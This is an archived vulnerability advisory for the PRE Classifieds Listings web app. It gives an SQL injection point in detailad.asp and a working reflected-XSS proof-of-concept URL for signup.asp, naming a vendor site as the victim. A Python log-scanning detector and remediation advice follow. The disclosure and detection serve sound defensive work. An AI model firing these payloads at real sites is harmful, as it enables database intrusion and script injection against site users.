PRE Classifieds Listings SQL,XSS

2009-08-04 / 2009-08-05
Credit: Pouya_Server
Risk: High
Local: No
Remote: Yes
CWE: CWE-89

#########################################################
---------------------------------------------------------
Portal Name: PRE Classifieds Listings
Vendor : http://www.preproject.com/
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (SQL,XSS)
---------------------------------------------------------
#########################################################

[SQL]:
http://site.com/[Path]/home/detailad.asp?siteid=[SQL]

[XSS]:
http://site.com/[Path]/home/signup.asp?full_name=pouya.s3rver@gmail.com&email=111-222-1933email@address.tst&pass=111-222-1933email@address.tst&address=</textarea><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&phone=111-222-1933email@address.com&state=0&hide_email=on&url_add=111-222-1933email@address.tst&Submit=SignUp&addit=start

---------------------------------
Victim : http://preproject.com/pclasp/

References:

http://xforce.iss.net/xforce/xfdb/47006
http://www.securityfocus.com/bid/32566
http://packetstormsecurity.org/0812-exploits/preclass-sqlxss.txt
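
Detection sketch for the two request patterns above (an added example, not part of the original advisory or the vendor's code). It flags detailad.asp requests whose siteid is not a plain integer and signup.asp requests whose parameters carry markup characters. The log format, the /classifieds/ path, the sample lines and the assumption that siteid is numeric are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 "GET /classifieds/home/detailad.asp?siteid=12 HTTP/1.1" 200',
    '203.0.113.9 "GET /classifieds/home/detailad.asp?siteid=12%27 HTTP/1.1" 500',
    '203.0.113.9 "GET /classifieds/home/signup.asp?full_name=a'
    '&address=%3C/textarea%3E%3CScRiPt%20%0a%0d%3Ealert(1)%3B%3C/ScRiPt%3E'
    '&Submit=SignUp HTTP/1.1" 200',
    '198.51.100.7 "GET /classifieds/home/signup.asp?full_name=Ann'
    '&address=12%20Main%20St&Submit=SignUp HTTP/1.1" 200',
]

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Characters that let a value break out of a <textarea> body or a quoted attribute.
MARKUP = re.compile(r'[<>"]')
INTEGER = re.compile(r'[0-9]+')


def classify(line):
    """Return a finding tag for one log line, or None if nothing matches."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    page = url.path.rsplit('/', 1)[-1].lower()
    # parse_qs percent-decodes, so %3C and %27 are seen as < and '.
    params = parse_qs(url.query, keep_blank_values=True)
    if page == 'detailad.asp':
        # Assumption: siteid is a numeric record id; anything else is suspect.
        if any(not INTEGER.fullmatch(v) for v in params.get('siteid', [])):
            return 'sqli-siteid'
    if page == 'signup.asp':
        for name, values in params.items():
            if any(MARKUP.search(v) for v in values):
                return 'xss-' + name
    return None


def scan(lines):
    """Return (client_ip, finding) pairs for every flagged line."""
    return [(ln.split()[0], tag) for ln in lines if (tag := classify(ln))]


if __name__ == '__main__':
    for ip, tag in scan(SAMPLE_LOG):
        print(ip, tag)
```

The same two checks (integer-only siteid, no markup characters in signup fields) are what server-side input validation would enforce, alongside parameterized queries and HTML-encoding of echoed form values.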


Copyright 2024, cxsecurity.com